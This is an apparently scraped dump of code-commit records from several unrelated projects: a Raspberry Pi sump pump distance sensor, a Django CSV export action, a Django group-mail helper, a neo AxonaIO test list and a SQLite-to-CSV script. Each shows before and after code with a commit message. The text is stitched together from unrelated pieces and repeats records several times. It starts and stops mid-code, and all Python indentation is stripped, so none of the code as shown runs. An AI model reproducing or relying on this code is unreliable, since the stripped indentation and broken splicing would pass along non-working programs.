trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
# Quick explaination of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
Return distance from sump pump sensorimport time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
# Quick explaination of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
return distance
|
<commit_before>import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
# Quick explaination of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
<commit_msg>Return distance from sump pump sensor<commit_after>import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
# Quick explaination of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
return distance
|
3d439d81766f354de9ab257d5ed690efd4aeb508
|
nap/extras/actions.py
|
nap/extras/actions.py
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import Writer
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = Writer(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
Adjust for renamed CSV class
|
Adjust for renamed CSV class
|
Python
|
bsd-3-clause
|
limbera/django-nap,MarkusH/django-nap
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
Adjust for renamed CSV class
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import Writer
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = Writer(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
<commit_before>
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
<commit_msg>Adjust for renamed CSV class<commit_after>
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import Writer
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = Writer(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
Adjust for renamed CSV class
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import Writer
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = Writer(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
<commit_before>
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
<commit_msg>Adjust for renamed CSV class<commit_after>
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import Writer
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = Writer(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
dc47a724525186fe99d79e62447efc3dbc9d95b0
|
app/groups/utils.py
|
app/groups/utils.py
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(ctx), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), to_email)
msg.attach_alternative(get_template(email_html_template).render(ctx), 'text/html')
msg.send(fail_silently=True)
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
messages = [generate_mail(ctx, email_text_template, email_html_template, to, subject) for to in to_email]
connection = get_connection(fail_silently=True)
connection.send_messages(messages)
def generate_mail(context, email_text_template, email_html_template, to, subject):
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(context), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), [to])
msg.attach_alternative(get_template(email_html_template).render(context), 'text/html')
return msg
|
Send individual mails, to avoid showing the whole to list, BCC and spamholing from Google
|
Send individual mails, to avoid showing the whole to list, BCC and spamholing from Google
|
Python
|
bsd-3-clause
|
nikdoof/test-auth
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(ctx), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), to_email)
msg.attach_alternative(get_template(email_html_template).render(ctx), 'text/html')
msg.send(fail_silently=True)
Send individual mails, to avoid showing the whole to list, BCC and spamholing from Google
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
messages = [generate_mail(ctx, email_text_template, email_html_template, to, subject) for to in to_email]
connection = get_connection(fail_silently=True)
connection.send_messages(messages)
def generate_mail(context, email_text_template, email_html_template, to, subject):
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(context), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), [to])
msg.attach_alternative(get_template(email_html_template).render(context), 'text/html')
return msg
|
<commit_before>from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(ctx), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), to_email)
msg.attach_alternative(get_template(email_html_template).render(ctx), 'text/html')
msg.send(fail_silently=True)
<commit_msg>Send individual mails, to avoid showing the whole to list, BCC and spamholing from Google<commit_after>
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
messages = [generate_mail(ctx, email_text_template, email_html_template, to, subject) for to in to_email]
connection = get_connection(fail_silently=True)
connection.send_messages(messages)
def generate_mail(context, email_text_template, email_html_template, to, subject):
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(context), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), [to])
msg.attach_alternative(get_template(email_html_template).render(context), 'text/html')
return msg
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(ctx), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), to_email)
msg.attach_alternative(get_template(email_html_template).render(ctx), 'text/html')
msg.send(fail_silently=True)
Send individual mails, to avoid showing the whole to list, BCC and spamholing from Googlefrom django.conf import settings
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
messages = [generate_mail(ctx, email_text_template, email_html_template, to, subject) for to in to_email]
connection = get_connection(fail_silently=True)
connection.send_messages(messages)
def generate_mail(context, email_text_template, email_html_template, to, subject):
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(context), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), [to])
msg.attach_alternative(get_template(email_html_template).render(context), 'text/html')
return msg
|
<commit_before>from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(ctx), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), to_email)
msg.attach_alternative(get_template(email_html_template).render(ctx), 'text/html')
msg.send(fail_silently=True)
<commit_msg>Send individual mails, to avoid showing the whole to list, BCC and spamholing from Google<commit_after>from django.conf import settings
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
messages = [generate_mail(ctx, email_text_template, email_html_template, to, subject) for to in to_email]
connection = get_connection(fail_silently=True)
connection.send_messages(messages)
def generate_mail(context, email_text_template, email_html_template, to, subject):
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(context), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), [to])
msg.attach_alternative(get_template(email_html_template).render(context), 'text/html')
return msg
|
cfcce6d4002657f72afdd780af06b3bfa4d9e10d
|
neo/test/iotest/test_axonaio.py
|
neo/test/iotest/test_axonaio.py
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set'
]
if __name__ == "__main__":
unittest.main()
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set',
'axona/dataset_unit_spikes/20140815-180secs.set'
]
if __name__ == "__main__":
unittest.main()
|
Add new files to common io tests
|
Add new files to common io tests
|
Python
|
bsd-3-clause
|
apdavison/python-neo,NeuralEnsemble/python-neo,JuliaSprenger/python-neo,samuelgarcia/python-neo,INM-6/python-neo
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set'
]
if __name__ == "__main__":
unittest.main()
Add new files to common io tests
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set',
'axona/dataset_unit_spikes/20140815-180secs.set'
]
if __name__ == "__main__":
unittest.main()
|
<commit_before>"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set'
]
if __name__ == "__main__":
unittest.main()
<commit_msg>Add new files to common io tests<commit_after>
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set',
'axona/dataset_unit_spikes/20140815-180secs.set'
]
if __name__ == "__main__":
unittest.main()
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set'
]
if __name__ == "__main__":
unittest.main()
Add new files to common io tests"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set',
'axona/dataset_unit_spikes/20140815-180secs.set'
]
if __name__ == "__main__":
unittest.main()
|
<commit_before>"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set'
]
if __name__ == "__main__":
unittest.main()
<commit_msg>Add new files to common io tests<commit_after>"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set',
'axona/dataset_unit_spikes/20140815-180secs.set'
]
if __name__ == "__main__":
unittest.main()
|
474f213cf2cc4851f9cfcd17652a29ad74ab1f0d
|
write_csv.py
|
write_csv.py
|
import sqlite3
import csv
from datetime import datetime
current_date = datetime.now().strftime('%Y-%m-%d')
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date LIKE ?", current_date)
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
import sqlite3
import csv
from datetime import datetime
current_date = str(datetime.now().strftime('%Y-%m-%d'))
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
Change current date in SQLite query to tuple
|
Change current date in SQLite query to tuple
|
Python
|
mit
|
andrewlrogers/srvy
|
import sqlite3
import csv
from datetime import datetime
current_date = datetime.now().strftime('%Y-%m-%d')
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date LIKE ?", current_date)
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
Change current date in SQLite query to tuple
|
import sqlite3
import csv
from datetime import datetime
current_date = str(datetime.now().strftime('%Y-%m-%d'))
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
<commit_before>import sqlite3
import csv
from datetime import datetime
current_date = datetime.now().strftime('%Y-%m-%d')
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date LIKE ?", current_date)
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
<commit_msg>Change current date in SQLite query to tuple<commit_after>
|
import sqlite3
import csv
from datetime import datetime
current_date = str(datetime.now().strftime('%Y-%m-%d'))
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
import sqlite3
import csv
from datetime import datetime
current_date = datetime.now().strftime('%Y-%m-%d')
